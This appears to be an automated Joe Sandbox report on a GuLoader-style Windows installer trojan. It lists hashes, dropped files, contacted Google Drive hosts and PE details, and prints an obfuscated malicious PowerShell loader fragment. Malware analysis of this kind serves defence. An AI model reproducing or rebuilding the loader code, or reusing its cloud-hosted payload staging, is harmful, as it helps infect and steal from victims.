00000007.00000003.1836071609.0000000006317000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2155297337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2554468315.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1928624482.000000000636B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.usercontent.google.com/0msiexec.exe, 00000007.00000002.2665098123.00000000062FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1770102180.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              172.217.16.193
                                                              		drive.usercontent.google.comUnited States
                                                              		15169GOOGLEUSfalse
                                                              216.58.206.46
                                                              		drive.google.comUnited States
                                                              		15169GOOGLEUSfalse

                                                              General Information

                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1588326
                                                              Start date and time:2025-01-11 00:00:14 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 39s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:11
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:TVPfW4WUdj.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:efef6cea36d9dd6e74cdf5adb9108ab1d0d3429de4d66898595f6c954e95c377.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@6/13@2/2
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 94%
                                                              • Number of executed functions: 94
                                                              • Number of non-executed functions: 24
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 4.175.87.197
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 5268 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              18:01:15API Interceptor38x Sleep call for process: powershell.exe modified
                                                              18:01:51API Interceptor36x Sleep call for process: msiexec.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASNs

                                                              No context

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37f463bf4616ecd445d4a1937da06e19WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46
                                                              WtZl31OLfA.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46
                                                              czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46
                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46
                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46
                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46
                                                              b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46
                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46
                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46
                                                              V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 172.217.16.193
                                                              • 216.58.206.46

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):53158
                                                              Entropy (8bit):5.062687652912555
                                                              Encrypted:false
                                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                              MD5:5D430F1344CE89737902AEC47C61C930
                                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bvnebjn.m4c.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wnzfnsv.t3r.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x3fwo2n.ygl.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvohsymn.b0s.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\depersonaliseredes\Begravelsesopsparing15.Rnn

                                                              Download File
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:GTA audio index data (SDT)
                                                              Category:dropped
                                                              Size (bytes):337232
                                                              Entropy (8bit):7.684331375702508
                                                              Encrypted:false
                                                              SSDEEP:6144:ZqR6Gd3ZDm5/I/o5LxucwhvjJxbPD5BBugQvNIUf7t9jExf/hRu:oR6Gjy5HahLJfBUBWUf70pzu
                                                              MD5:1639E2A4EBDF458FF751E71BAB70B2E9
                                                              SHA1:061B4478665E3B7123E9E71F52D1C842D4B3C90F
                                                              SHA-256:690927A3F3DE1E055D99DC28F3A178C8A0FC256C9BED04E7D0EAC456EA647B90
                                                              SHA-512:D5F327DFBC443A4B1F13B4EF3D8E77EACC09D24F95E5A11602295CFD98261E07D9AC2BB50F5F262F4405629074F2A221CDBBF88661F0B79BC07C65E237E3CE74
                                                              Malicious:false
                                                              Preview:....77.........t.....KK..........DDDDD......#.................................................FFF...........................................**........oooo..................DDD.........G.................hh.u..............d..SS............*...C.......k.................t..%%.........))).D......................T.{.N...-----......G..1..........................~~..........000.......)....................pppp................................................s..6...pp..........G.................''..........e..............```.....................FFFF..............^..ttttt........hh..................$$...........rr..fff.....i........FFFFFFF....................ll............A.......yy..................vvvv......HH.w..Y...............d.... .................3...WW.............DDDD..............nn.+.$$$$.......S.UUU.........6.....................>..c.NN...).RRRR.........DD......XXX..............q.z.}............m..!......[.jj...n.bb...........................P....F......I...&.....e...............!.www

                                                              C:\Users\user\AppData\Local\Temp\depersonaliseredes\Ceylonteer.kae

                                                              Download File
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):489410
                                                              Entropy (8bit):1.2436305558399738
                                                              Encrypted:false
                                                              SSDEEP:1536:cU0VmvQia2T11QAJnUkKziB0gN0lQus3vm1YAzEYu:QVr4Z1QAJnUkKzK0gGlav67u
                                                              MD5:03ADD5EC69F2D821F4BDDF502603364B
                                                              SHA1:CEB941FCEF1D7D81F2BCC650E311A074B72D4DB0
                                                              SHA-256:A8850B76F116EB91305228F5F39B2B6152927531705DE707A60FC74B86DF4003
                                                              SHA-512:4B5864679A31EA4B0268A758B8179E14A1A682059B393834DE0260315BC0D086F1D98E944E0429304FFF518105226C5A9FD991050D98168059C34BCA1A677B2C
                                                              Malicious:false
                                                              Preview:...W............................................................H..p.........;..................C.................................w............................j.......?........ .+................................................................c........b......................7......................H....................".......................................IG+.......................y...................................x...................................L..................+............8...................................................................................o..[......................................1...........................s..............................................4.............8.................E...................................................................T..........................................H..............................W..........................H.....................X................8................................<...........K........................

                                                              C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met

                                                              Download File
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:Unicode text, UTF-8 text, with very long lines (4415), with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):69917
                                                              Entropy (8bit):5.1934732121055625
                                                              Encrypted:false
                                                              SSDEEP:1536:cnbuw/Q0vaewWSXJR+0dXUKRTTrh3f42AyOPh9Y7xe:E/CrWSZI0uKRTJRAyOP/gk
                                                              MD5:9B996ACD991E5AD14B711D89757782C8
                                                              SHA1:C2B37AD59CA09AFBAB44989EA3E7F4A2FE757D65
                                                              SHA-256:46D206B22BBA908C9F1C7B7D973162220B16121704F8641B204859B48DA7BFF3
                                                              SHA-512:36E0D204763195517C7E409CC1612AD303114AAC60334F7D8C4BA0DB42727997CAD4B52DE00959430EC6AA9103BAE0E037736D9EB0BFF03853A34197CA127A8A
                                                              Malicious:true
                                                              Preview:$Fro=$Sorb;........$Begrendes = @'.Afprvni.Proje,s$LiebhavUg rlingn materidHnseneseDerud crEmancipaAfsl tnrAvokadom Sekrets opastomManometuEksekutsActuatikobloquiechontawlPiquett=Haemate$AnemobiSBispehui Chowchk FysiurkDdsscene rummaarIm etrahFlysim e Dolourdbadul ess ndendrAnstrgsa OlenelaFatti,hdGeorgiae Husbant Stvsug6Afgifts4 Maesto; Utilit.Ekstraof Milja uKingsbenYderpuncNavnenetHel,cini Korsr.o Postekn Biblio SmeekskJSkovmr u SandsylUn.roptet ioaldtfernissrPangamyePerid nr ProvisnParalleeForgive U serfl(Obligem$ BlindeT M rtenaKorrumpitredoblnLeannestFors niuO ientarDialyseeKachere1Planobl,Dustcoa$ ElskovSAgaterncRijsttarGastropu Crapehf TittisfOpskruei PsychieLnnerrasLowbytet amgrss7Fleksiv)Fioldis Cross,u{Raphid .Theosop.Sikkerh$RetmaskFEu uchroDaastemr lectrou.nhrensr Trogl oAfspndilPatronaiDelimitgReconsueLitogral Tidnd sklinkene D,hybr Monorga(MormoniGFunktioe HldninsAparthriPerisphm elvflgsPhonogre OpsamlnIndfoersInstruk fordli'Sicc tidCountere NonepicBillhoolParametaBin,

                                                              C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\Fleece.kar

                                                              Download File
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 42-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 34359738368.000000
                                                              Category:dropped
                                                              Size (bytes):359870
                                                              Entropy (8bit):1.2579154698125035
                                                              Encrypted:false
                                                              SSDEEP:768:rJW+KJEK8CwPtS6DGm9KLLa+yoa6PQw3HNilLOurKGMTXU9NOXHeFG1jfERxHJ8i:iMCknb2N+S8kEqSe8PW7FZs4baLL
                                                              MD5:8A6A8A75FE9A08909B09C7242C1B0C73
                                                              SHA1:0EC96FBA81824408C7838638BDA73C6C1D055CFA
                                                              SHA-256:1AAD58A3F50A3EF4E50AFCECBAF81D840F4E3F0C512BCC5844A1AEC594A06FF7
                                                              SHA-512:4322DC485F01AD114244945AA63652B191E6BE6C5B4531678310C160AC8963A6FD30E3936747C9282C8EF147806324E99EE954929EB4F1568ADB71E8C89AD596
                                                              Malicious:false
                                                              Preview:....................................................p.................................................................!......................................Tm.......f.............................................X.................B.................j......................................................................t.....................u..........1............+..g....4.B.............................................................................].............Q......m.......................U.....................D..........................Y..y..........................................................t................................................$...............................................................................................................................X..........C....................................h.V...........E...............................................................................t.......................2...c..........................................

                                                              C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exe

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Category:dropped
                                                              Size (bytes):859801
                                                              Entropy (8bit):7.712622921398649
                                                              Encrypted:false
                                                              SSDEEP:12288:wTJidkhIqHdLlCJqFwvkldLMWAqDUGwX1QWu3FwKmrMhiNAgZY8i3oXRKQCzcdYz:wTkQIwLPExWnUGtWWFwK/sfZV+ER/y
                                                              MD5:5DEC892FCAF6F21AC6780C69F631F82C
                                                              SHA1:851AE1F87751CBED45A523FC340771F998E62DB1
                                                              SHA-256:EFEF6CEA36D9DD6E74CDF5ADB9108AB1D0D3429DE4D66898595F6C954E95C377
                                                              SHA-512:634F1686A1C25A6855070E0C7A8A8D7C7A0DA8241A4D7EBED6E8E44D51C8D21911482279623FC50161077BEBA9685CDDD862A26F4FC407E06A70D80FC2CA8F8A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 55%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*......Y3............@.......................................@..........................................................................................................................................................text....b.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\montricens.fus

                                                              Download File
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):409643
                                                              Entropy (8bit):1.258117650984378
                                                              Encrypted:false
                                                              SSDEEP:1536:oK/xjE18JOxBR9iH6C0q2bSbck323mbP5cA:ooEOAxsxw222bRn
                                                              MD5:0B038FD9C23C723696185E52EBCCB874
                                                              SHA1:26F3EE8ABCC584DC46AB1AF5C6B1C26C3914F1A8
                                                              SHA-256:1E6B1012ABE05CD0B6409C6844E61C6314CF9EE5E04AF6E89352E09166C80B13
                                                              SHA-512:8BE9637A6195820DBD8BF6FDB6B35CD0499F007E36FB2B474D9120559473A98EB09CD622821821B16C7DFCE9D98EDDC61D647A61025C4CC36F451C88569E3100
                                                              Malicious:false
                                                              Preview:...tB...........*...............................T..........w....O.............r...#......].....m.......I.....................H..................................................................................}2.Wa..................&......u...............M................c.......................................................................i...................9..."...........y...u......b.....)........................................................................^...........................G.............g..................................................................:.....p........k..................1................:............U...........................................I................................................A.......^..............0....]..........+...............................................l.........k...................................................r....-.............................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\udsds.aut

                                                              Download File
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):499434
                                                              Entropy (8bit):1.2603431949153356
                                                              Encrypted:false
                                                              SSDEEP:1536:fIH5W+q2nuI9Zg1tjaKFi1fc/si9MKqe79+cX2v4Jm:fIHJnZ9+Za/1fwr9FN
                                                              MD5:152C1126D35B77FC957526436ADBEA38
                                                              SHA1:A8B0E26555F1FAAB8ED05EAAF9DDE5DCA113572B
                                                              SHA-256:67780594962B62DD23C55340C9AB1CD11858C15F464E8EE312A690A1759EAFD3
                                                              SHA-512:A8BC5BE5A093095759D3ADB587B58B083DAD6FC9B942161D1A9F0B055E314C69506BAE2409E3D5E195068FB8BAE2C4F1EFFAD6A082276423F9989AF012A5A856
                                                              Malicious:false
                                                              Preview:................................I.....l........................k.......a.......................w....................=...................b.......................{.......+..............................=..................................h............. ......................&.g..........................#.........&..............E.........................................................................................................................................../.........j..{.........<....l......+...........4.........................................................?.................F....................~............~...................u..................P.................'....................................................................j.......................................................O..D............ ..................................V....................................................................8................S.......................................................\..

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Entropy (8bit):7.712622921398649
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:TVPfW4WUdj.exe
                                                              File size:859'801 bytes
                                                              MD5:5dec892fcaf6f21ac6780c69f631f82c
                                                              SHA1:851ae1f87751cbed45a523fc340771f998e62db1
                                                              SHA256:efef6cea36d9dd6e74cdf5adb9108ab1d0d3429de4d66898595f6c954e95c377
                                                              SHA512:634f1686a1c25a6855070e0c7a8a8d7c7a0da8241a4d7ebed6e8e44d51c8d21911482279623fc50161077beba9685cddd862a26f4fc407e06a70d80fc2ca8f8a
                                                              SSDEEP:12288:wTJidkhIqHdLlCJqFwvkldLMWAqDUGwX1QWu3FwKmrMhiNAgZY8i3oXRKQCzcdYz:wTkQIwLPExWnUGtWWFwK/sfZV+ER/y
                                                              TLSH:54051280B594B2FEF7538A3CB827C5931BA66D0615813ADB22E0F31F54731A3D613B96
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*.....

                                                              File Icon

                                                              Icon Hash:07290d2d7979330f

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x403359
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x5C157F1B [Sat Dec 15 22:24:27 2018 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                              Entrypoint Preview

                                                              Instruction
                                                              sub esp, 000002D4h
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              push 00000020h
                                                              pop edi
                                                              xor ebx, ebx
                                                              push 00008001h
                                                              mov dword ptr [esp+14h], ebx
                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                              mov dword ptr [esp+1Ch], ebx
                                                              call dword ptr [004080A8h]
                                                              call dword ptr [004080A4h]
                                                              and eax, BFFFFFFFh
                                                              cmp ax, 00000006h
                                                              mov dword ptr [0042A20Ch], eax
                                                              je 00007FE63C8C03A3h
                                                              push ebx
                                                              call 00007FE63C8C3655h
                                                              cmp eax, ebx
                                                              je 00007FE63C8C0399h
                                                              push 00000C00h
                                                              call eax
                                                              mov esi, 004082B0h
                                                              push esi
                                                              call 00007FE63C8C35CFh
                                                              push esi
                                                              call dword ptr [00408150h]
                                                              lea esi, dword ptr [esi+eax+01h]
                                                              cmp byte ptr [esi], 00000000h
                                                              jne 00007FE63C8C037Ch
                                                              push 0000000Ah
                                                              call 00007FE63C8C3628h
                                                              push 00000008h
                                                              call 00007FE63C8C3621h
                                                              push 00000006h
                                                              mov dword ptr [0042A204h], eax
                                                              call 00007FE63C8C3615h
                                                              cmp eax, ebx
                                                              je 00007FE63C8C03A1h
                                                              push 0000001Eh
                                                              call eax
                                                              test eax, eax
                                                              je 00007FE63C8C0399h
                                                              or byte ptr [0042A20Fh], 00000040h
                                                              push ebp
                                                              call dword ptr [00408044h]
                                                              push ebx
                                                              call dword ptr [004082A0h]
                                                              mov dword ptr [0042A2D8h], eax
                                                              push ebx
                                                              lea eax, dword ptr [esp+34h]
                                                              push 000002B4h
                                                              push eax
                                                              push ebx
                                                              push 004216A8h
                                                              call dword ptr [00408188h]
                                                              push 0040A2C8h

                                                              Rich Headers

                                                              Programming Language:
                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x2cb90.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x62a50x64005814efda24a547f46f687d77de540309False0.6590234375data6.431421556070023IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x80000x13960x1400ef1be07ca8b096915258569fb3718a3cFalse0.453125data5.159710562612049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xa0000x203180x6007d0d44c89e64b001096d8f9c60b1ac1bFalse0.4928385416666667data3.90464114821524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .ndata0x2b0000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x5d0000x2cb900x2cc0029feacfb95f10d2c97620b954bab0c03False0.5635693086592178data5.592801421778874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0x5d4180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.5097598485744707
